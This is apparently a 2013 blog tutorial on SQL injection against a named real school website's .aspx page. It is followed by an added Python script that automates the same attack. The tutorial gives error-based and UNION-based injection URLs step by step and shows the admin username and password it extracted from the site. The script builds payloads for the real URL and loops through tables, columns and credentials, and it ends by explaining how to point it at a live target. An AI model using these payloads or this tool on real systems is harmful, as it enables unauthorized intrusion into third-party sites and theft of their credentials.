Sunday 6 January 2013

mssql server injection tutorial [pics]

This is how I injected an MSSQL server behind an .aspx page.

vul link=http://ogis.edu.in/ViewPhoto.aspx?gid=46

1st way (error-based):
Finding the version. Forcing a string into int makes SQL Server raise a conversion error that echoes the string back in the error message:

Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 or 1=cast(@@version as int)

Finding database:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 or 1=convert(int,db_name())

I will not go deep into this method. There is already a tutorial about it here.

2nd way (UNION-based):
1. Finding the number of columns:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 1-- -

It loads normally. That's good.

Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 10-- -
output:
[Image: 54025460.jpg]

So let's reduce it:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 9-- -

Page loads normally, so there are 9 columns.

2. Next we do UNION ALL SELECT.
Remember that with MSSQL behind ASPX you will usually not see the numbers come back as vulnerable columns: the integer placeholders have to match the types of the original columns, otherwise the page just throws a conversion error. You have to find the displayed column manually.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
output:
[Image: 54898417.jpg]

Don't worry. There are two ways from here.

1st way (easy): this rarely works, and it is the normal UNION injection.

Just change gid=46 to gid=-46, so the original query returns no rows and only the UNION row gets displayed.
So the injection will be:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
output:
[Image: 50983947.jpg]

Vulnerable column = 2
Version:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,@@version,3,4,5,6,7,8,9-- -
@@version gives the version in MSSQL.
Remember that version() is MySQL syntax and will not work here.

User:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,user_name(),3,4,5,6,7,8,9-- -

You can also use current_user, user or system_user instead of user_name().

Database:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(),3,4,5,6,7,8,9-- -
db_name() gives the current database.

Now replace db_name() with db_name(1), db_name(2), ..., db_name(n) until you run out of databases: the argument is the database id, and the call returns NULL once you pass an id that does not exist.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(1),3,4,5,6,7,8,9-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(11),3,4,5,6,7,8,9-- -

Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,schema_name,3,4,5,6,7,8,9 from information_Schema.schemata-- -
This lists all of them in one go. Note that in MSSQL information_schema.schemata is per database, so what it really returns are the schemas of the current database (dbo and friends), not the other databases; to list the actual databases, query the name column of master..sysdatabases (or sys.databases) instead.
[Image: 93957090.jpg]

Tables:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,table_name,3,4,5,6,7,8,9 from information_Schema.tables where table_schema!=db_name()-- -
Here !=db_name() is meant to exclude the current database, but in MSSQL table_schema is the schema (normally dbo), not the database, and information_schema.tables only ever lists the database you are connected to. So in practice the filter changes nothing and you get all tables of the current database; to see another database's tables you would query otherdb.information_schema.tables. The juicy table is o_adminmst.
[Image: 82377563.jpg]

Columns:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,column_name,3,4,5,6,7,8,9 from information_Schema.columns where table_name='o_adminmst'-- -
[Image: 53670075.jpg]

Data:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,username,3,4,5,6,7,8,9 from o_adminmst-- -
username = admin
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,password,3,4,5,6,7,8,9 from o_adminmst-- -
password = admin123#

2nd way (important): this way works with UNION on many sites and challenges.
Let's say you are stuck here:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -

Now replace all columns with NULL, which is accepted by every column type, so it looks like:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT null,null,null,null,null,null,null,null,null-- -

Now start replacing each null in turn with convert(int,@@version) or cast(@@version as int) (not version(), which is MySQL). Try the positions one by one; the one that comes back with the conversion error carrying the version string is the one to keep using.

In my case replacing the first null gives the answer.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,@@version),null,null,null,null,null,null,null,null-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(@@version as int),null,null,null,null,null,null,null,null-- -
[Image: 52115856.jpg]

User:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(user_name() as int),null,null,null,null,null,null,null,null-- -
output=
Conversion failed when converting the nvarchar value 'db_ogis' to data type int.

You can also use current_user, user or system_user instead of user_name().

Database:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(db_name() as int),null,null,null,null,null,null,null,null-- -

output=
Conversion failed when converting the nvarchar value 'db_ogis' to data type int.

Tables:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 table_name from information_schema.tables where table_schema!=db_name())) ,null,null,null,null,null,null,null,null-- -

output=Conversion failed when converting the nvarchar value 'o_updatemst' to data type int.

For the next table, exclude the one you have already seen (top 1 without an order by is not guaranteed to be stable, which is why you exclude by name rather than counting):
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 table_name from information_schema.tables where table_schema!=db_name() and table_name<>'o_updatemst')) ,null,null,null,null,null,null,null,null-- -

output=Conversion failed when converting the nvarchar value 'o_pagemaster' to data type int.

Columns:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 column_name from information_schema.columns where table_name='o_adminmst')) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the nvarchar value 'adminid' to data type int.

For the next column, same as for tables:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 column_name from information_schema.columns where table_name='o_adminmst' and column_name<>'adminid')) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the nvarchar value 'username' to data type int.

Data:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 username from o_adminmst)) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the varchar value 'admin' to data type int.

Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 password from o_adminmst)) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the varchar value 'admin123#' to data type int.

You can use %2b to get the username and password in one go.
%2b is the URL encoding of +, the MSSQL string concatenation operator; a literal + in the query string would be decoded as a space by the server.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 username%2b'/'%2bpassword from o_adminmst)) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the varchar value 'admin/admin123#' to data type int.
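The table -> column -> data walk above is tedious by hand, so here is an added example (my own code, not from the original post) that automates it: it builds the convert(int,(select top 1 ...)) payload, parses the "Conversion failed when converting ..." error that both the 1st way at the top of the post and this 2nd way rely on, and replaces the growing chain of column<>'x' clauses with a single column not in (...) that excludes everything already leaked. The target is a constructed stand-in built on SQLite, with made-up metadata chosen to match the screenshots (db_ogis, o_updatemst, o_pagemaster, o_adminmst, admin/admin123#); the function and class names are my own and nothing here talks to the real server.

```python
import re
import sqlite3
import urllib.parse
from typing import Callable, List, Optional

# The SQL Server error that leaks the value, as quoted in the post.
CONV_ERR = re.compile(
    r"Conversion failed when converting the n?varchar value '(.*?)' to data type int\."
)


def extract_value(body: str) -> Optional[str]:
    """Pull the leaked string out of a response, or None if no error fired."""
    m = CONV_ERR.search(body)
    return m.group(1) if m else None


def sql_literal(value: str) -> str:
    """Quote a value for use inside the injected subquery."""
    return "'" + value.replace("'", "''") + "'"


def build_payload(base_url: str, param: str, value: str, subquery: str, ncols: int) -> str:
    """Build the 'UNION all SELECT convert(int,(...)),null,...' URL from the post.

    Everything is percent-encoded, so a + used for string concatenation
    becomes %2B instead of being decoded as a space by the server.
    """
    nulls = ",".join(["null"] * (ncols - 1))
    injection = f"{value} UNION all SELECT convert(int,({subquery})),{nulls}-- -"
    return f"{base_url}?{param}={urllib.parse.quote(injection, safe='')}"


def enumerate_column(fetch: Callable[[str], str], column: str, source: str,
                     where: str = "", limit: int = 50) -> List[str]:
    """Walk 'select top 1 ... not in (seen)' until the error stops appearing.

    This generalises the post's chain of "and column<>'x'" clauses: each round
    excludes everything already leaked, and a response without the conversion
    error means top 1 returned NULL, i.e. nothing is left.
    """
    found: List[str] = []
    while len(found) < limit:
        conds = [where] if where else []
        if found:
            conds.append(f"{column} not in ({','.join(sql_literal(v) for v in found)})")
        sub = f"select top 1 {column} from {source}"
        if conds:
            sub += " where " + " and ".join(conds)
        val = extract_value(fetch(sub))
        if val is None:
            break
        found.append(val)
    return found


class FakeTarget:
    """Constructed stand-in for the vulnerable page (made-up data matching the
    screenshots, not pulled from the real server)."""

    def __init__(self) -> None:
        self.db = sqlite3.connect(":memory:")
        # Attach a second in-memory DB so 'information_schema.tables' resolves.
        self.db.execute("attach ':memory:' as information_schema")
        self.db.create_function("db_name", 0, lambda: "db_ogis")
        self.db.executescript(
            """
            create table information_schema.tables(table_schema text, table_name text);
            insert into information_schema.tables values
                ('dbo','o_updatemst'),('dbo','o_pagemaster'),('dbo','o_adminmst');
            create table information_schema.columns(table_name text, column_name text);
            insert into information_schema.columns values
                ('o_adminmst','adminid'),('o_adminmst','username'),('o_adminmst','password');
            create table o_adminmst(adminid integer, username text, password text);
            insert into o_adminmst values (1,'admin','admin123#');
            """
        )

    def fetch(self, subquery: str) -> str:
        # SQL Server's 'top 1' becomes SQLite's 'limit 1'; the rest runs as written.
        m = re.match(r"select top 1 (.+?) from (.+)$", subquery, re.I)
        if not m:
            return "<html>Incorrect syntax</html>"
        row = self.db.execute(f"select {m.group(1)} from {m.group(2)} limit 1").fetchone()
        if row is None or row[0] is None:
            return "<html>ViewPhoto page loads normally</html>"
        return f"Conversion failed when converting the nvarchar value '{row[0]}' to data type int."


def run_demo(target: FakeTarget) -> dict:
    """Reproduce the post's table -> column -> data walk against the target."""
    tables = enumerate_column(target.fetch, "table_name", "information_schema.tables",
                              "table_schema!=db_name()")
    columns = enumerate_column(target.fetch, "column_name", "information_schema.columns",
                               "table_name='o_adminmst'")
    creds = {}
    for user in enumerate_column(target.fetch, "username", "o_adminmst"):
        creds[user] = enumerate_column(target.fetch, "password", "o_adminmst",
                                       f"username={sql_literal(user)}")
    return {"tables": tables, "columns": columns, "creds": creds}


if __name__ == "__main__":
    print(run_demo(FakeTarget()))
    print(build_payload("http://ogis.edu.in/ViewPhoto.aspx", "gid", "46",
                        "select top 1 username+'/'+password from o_adminmst", 9))
```

To point it at a real target you would replace FakeTarget.fetch with a function that sends the URL from build_payload and returns the response body; the loop stops on its own because a missing row makes top 1 return NULL, and convert(int,NULL) raises no error.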

That's it.
